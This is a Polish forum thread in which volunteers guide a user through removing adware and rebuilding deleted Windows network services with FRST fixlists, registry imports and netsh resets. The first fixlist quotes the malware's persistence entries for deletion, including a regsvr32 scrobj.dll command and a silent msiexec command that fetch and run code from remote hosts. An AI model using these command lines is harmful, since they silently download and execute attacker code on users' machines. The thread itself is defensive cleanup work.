Dominika13 Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 Witam, Proszę o pomoc w usunięciu złośliwego oprogramowania, które zaatakowało mi lapka parę dni temu. Zostały stworzone katalogi Bagsarah, BiaoJi. Dodatkowo podmieniono przeglądarkę Chrome i zainstalowano Mozille, pojawiły się skr do gierek typu BigFarm itd. Próbowałam już kilkoma programikami usunąć zagrożenia ale nie do końca poszło wszystko tak jak trzeba. Używałam McAfee, IOBit Malware Fighter, IOBit Uninstaller, adwcleaner. Dodatkowo straciłam połączenie z siecią - nie wim czy w wyniku zniszczeń systemu jakie dokonało oprogramowanie czy problem jest po innej stronie. Dodam, że na innym sprzęcie podłączonym do sieci internet śmiga. Załączam logi z FRST i GMER. Addition.txt FRST.txt Shortcut.txt Gmer.txt Odnośnik do komentarza
Miszel03 Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 Temat niezgodny z regulaminem*, - brak raportu z AdwCleaner, więc akcję z nim muszę powtórzyć. * - teraz daruję. Twój opis pokłada się w całości z tym co ja widzę w systemie, więc powtarzanie sobie odpuszczę. Co do uszkodzenia połączenia to tyle razy tu powtarzam - "nie jesteś wykwalifikowany, szkolony to nie interpretuj wyników skanu samemu". Podejrzewam uszkodzenie łańcucha sieciowego i wdrążam jego reset. Jeśli zaś chodzi o oprogramowanie, które używałeś do dezynfekcji to firma IObit ma wiele kontrowersji, m.in kradzież bazy danych MBAM. Pod ocenę indywidualną zostawiam proces deinstalacji. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== scrobj.dll C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{A334B4CB-70C2-40AE-AC60-82462738B5FA}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{3A44F400-C937-46F0-8F78-609CA667F38A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\fundowic\AppData\Local\Bagsarah RemoveDirectory: C:\Program Files (x86)\Firefox HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q GroupPolicy: Restriction <======= ATTENTION R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed] C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll U3 mfeavfk01; no ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\fundowic\AppData\Local\Google DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\fundowic\AppData\Local\Mozilla C:\Users\fundowic\AppData\Roaming\Mozilla C:\Users\fundowic\AppData\Roaming\Profiles CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 3. Powtórz akcję z AdwCleaner, ale jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Dominika13 Opublikowano 13 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 13 Maja 2017 Witam, Dziękuję za tak szybką reakcję. Zrobiłam wszystko wg podanych instrukcji. Załączam wspomniane logi. Internetu na lapku nadal brak a jeśli chodzi o złośliwe oprogramowanie to wydaje mi się, że jest OK Addition.txt AdwCleanerS1.txt Fixlog.txt FRST.txt SearchReg.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 14 Maja 2017 Zgłoś Udostępnij Opublikowano 14 Maja 2017 Wdrażam poprawki dot. infekcji i z nimi chyba będziemy mieli już spokój. Pozostaje połączenia z internetem to, że nie możesz go włączyć normalnie (poprzez Panel sterowania) sugeruję uszkodzenia, więc poszerzam diagnostykę narzędziem FSS. Swoją drogą obstawiałem, że łańcuch sieciowy został uszkodzony jak to często bywa przy usuwaniu adware, ale jak widać chyba nie tym razem. Dodatkowo już wczoraj nie miałem czasu napisać: widać wyłączoną zaporę sieciową oraz usługę winmgmt (choć tworzenie punktów przywracania działa). Wydaję mi się, że one również mogą być uszkodzone - pobieram dane na ich temat z rejestru. 1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: RemoveDirectory: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah RemoveDirectory: HKEY_USERS\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Bagsarah RemoveDirectory: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox RemoveDirectory: HKEY_USERS\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Firefox U3 mfeavfk01; no ImagePath C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Help Manual.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Uruchom SystemLook, a następnie w białym, dużym oknie wklej: :reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mpsdrv /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\winmgmt /s Momentalnie wyskoczy raport - zaprezentuj go na forum. 4. Zrób raport z Farbar Service Scanner. 5. Zrób nowy zestaw raportów FRST i dostarcz plik Fixlog. Odnośnik do komentarza
Dominika13 Opublikowano 14 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 14 Maja 2017 Witam, Wszystkie wspomniane logi w załączniku. Mam nadzieję, że to wystarczy aby naprawić połączenie internetowe. Jeszcze raz dziękuję za Twoje zaangażowanie i pomoc. Addition.txt Fixlog.txt FRST.txt FSS.txt Shortcut.txt SystemLook.txt Odnośnik do komentarza
Miszel03 Opublikowano 15 Maja 2017 Zgłoś Udostępnij Opublikowano 15 Maja 2017 Usługi są uszkodzone i to poważnie, - musisz mi dać czas na rozpisanie rekonstrukcji. Reszta wygląda już w porządku. Odnośnik do komentarza
Dominika13 Opublikowano 15 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 15 Maja 2017 Witam, Rozumiem. Dziękuję za informację i czekam na rozwiązanie. Odnośnik do komentarza
Dominika13 Opublikowano 22 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 22 Maja 2017 Witam Miszel03, Czy masz już może gotową dla mnie rekonstrukcję? Pozdrawiam Odnośnik do komentarza
Miszel03 Opublikowano 22 Maja 2017 Zgłoś Udostępnij Opublikowano 22 Maja 2017 Proszę mi dać jeszcze trochę czasu - naprawdę nie mam go zbyt wiele. Odnośnik do komentarza
Dominika13 Opublikowano 29 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 29 Maja 2017 Hej, Ponawiam swoje pytanie, czy jest już rozwiązane problemu z połączeniem internetowym? Laptop bez dostępu do sieci traci 90% ze swojej przydatności Odnośnik do komentarza
picasso Opublikowano 29 Maja 2017 Zgłoś Udostępnij Opublikowano 29 Maja 2017 Brak sieci wynika z usunięcia usług Nsi i Winmgmt. Prócz rekonstrukcji tych usług, jeszcze drobne inne poprawki są tu wymagane. 1. Obecnie jako domyślna przeglądarka jest ustawione "Chrome", które nie istnieje w systemie. Ustaw Internet Explorer jako domyślną przeglądarkę. 2. Pobierz SetACL (na spodzie strony klik w "Administrators: Download the EXE version of SetACL 3.0.6 for 32-bit and 64-bit Windows"). Rozpakuj pobraną paczkę i z folderu x64 przekopiuj plik SetACL.exe do katalogu C:\Windows. 3. Otwórz Notatnik i wklej w nim: "machine\SYSTEM\CurrentControlSet\Services\nsi",4,"O:BA" "machine\SYSTEM\CurrentControlSet\Services\nsi\Parameters",4,"O:BAD:PAI(A;;KA;;;BA)(A;CIIO;GA;;;BA)(A;;KA;;;SY)(A;CIIO;GA;;;SY)(A;;CCLCSWRPRC;;;S-1-5-80-2310782386-4237065203-3688974353-390202159-3511571085)" Plik zapisz pod nazwą fix.txt na Pulpicie. Zarówno nazwa pliku jak i lokalizacja są obligatoryjne, gdyż te parametry zostaną użyte w skrypcie przywracającym uprawnienia podanym poniżej. 4. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartRegedit: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\nsi] "DisplayName"="@%SystemRoot%\\system32\\nsisvc.dll,-200" "ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\ 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,4c,00,6f,00,63,00,61,00,6c,00,53,00,65,00,72,00,76,00,69,00,63,\ 00,65,00,00,00 "Description"="@%SystemRoot%\\system32\\nsisvc.dll,-201" "ObjectName"="NT Authority\\LocalService" "ErrorControl"=dword:00000001 "Start"=dword:00000002 "Type"=dword:00000020 "DependOnService"=hex(7):6e,00,73,00,69,00,70,00,72,00,6f,00,78,00,79,00,00,00,\ 00,00 "ServiceSidType"=dword:00000001 "RequiredPrivileges"=hex(7):53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,\ 00,6c,00,6f,00,62,00,61,00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,\ 67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,\ 00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\ 00,00,00,00 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\nsi\Parameters] "ServiceDll"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,\ 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\ 6e,00,73,00,69,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00 "ServiceDllUnloadOnStop"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt] "DisplayName"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-205" "ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\ 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00 "Description"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-204" "ObjectName"="localSystem" "ErrorControl"=dword:00000000 "Start"=dword:00000002 "Type"=dword:00000020 "DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00 "ServiceSidType"=dword:00000001 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters] "ServiceDllUnloadOnStop"=dword:00000001 "ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\ 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\ 77,00,62,00,65,00,6d,00,5c,00,57,00,4d,00,49,00,73,00,76,00,63,00,2e,00,64,\ 00,6c,00,6c,00,00,00 "ServiceMain"="ServiceMain" EndRegedit: StartBatch: SetACL -on "HKLM\SYSTEM\CurrentControlSet\Services\nsi" -ot reg -actn restore -bckp C:\Users\fundowic\Desktop\fix.txt netsh advfirewall reset del /q C:\WINDOWS\SysWOW64\3333333 del /q C:\WINDOWS\SysWOW64\33 del /q C:\WINDOWS\SysWOW64\1111111 del /q C:\WINDOWS\SysWOW64\1111 del /q C:\WINDOWS\SysWOW64\11 del /q C:\WINDOWS\SysWOW64\00 EndBatch: DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\4fd88af7_0 DeleteKey: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\7909d0b6_0 DeleteValue: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache| C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders|C:\Program Files (x86)\Mozilla Firefox\plugins DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders|C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Quarantine RemoveDirectory: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705} RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip RemoveDirectory: C:\Program Files (x86)\BiaoJi RemoveDirectory: C:\Program Files (x86)\mozilla firefox RemoveDirectory: C:\Users\fundowic\AppData\LocalLow\Mozilla RemoveDirectory: C:\WINDOWS\system32\log Reboot: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. Odnośnik do komentarza
Dominika13 Opublikowano 29 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 29 Maja 2017 Witam, Dziękuję bardzo za pomoc. Wygląda na to, że wszystko wróciło do normy. W załączniku logi. Bardzo, bardzo WAM dziękuję. Jesteście wielcy!!! Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 30 Maja 2017 Zgłoś Udostępnij Opublikowano 30 Maja 2017 Wszystko zgodnie z planem wykonane w skrypcie, internet naprawiony. Na koniec: 1. Przez SHIFT+DEL (moja Kosz) skasuj folder C:\FRST oraz drugi folder z Pulpitu. 2. Do aktualizacji poniższe programy. Wytyczne w przyklejonym: KLIK. Wszystkie stare wersje Java do deinstalacji. ==================== Installed Programs ====================== Adobe Shockwave Player 12.1 (HKLM-x32\...\{07C5D2FF-2AA8-46D1-B9E8-BACCD34C8E01}) (Version: 12.1.4.154 - Adobe Systems, Inc) FileZilla Client 3.9.0.6 (HKLM-x32\...\FileZilla Client) (Version: 3.9.0.6 - Tim Kosse) Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation) Java SE Development Kit 8 Update 74 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180740}) (Version: 8.0.740.2 - Oracle Corporation) Odnośnik do komentarza
Rekomendowane odpowiedzi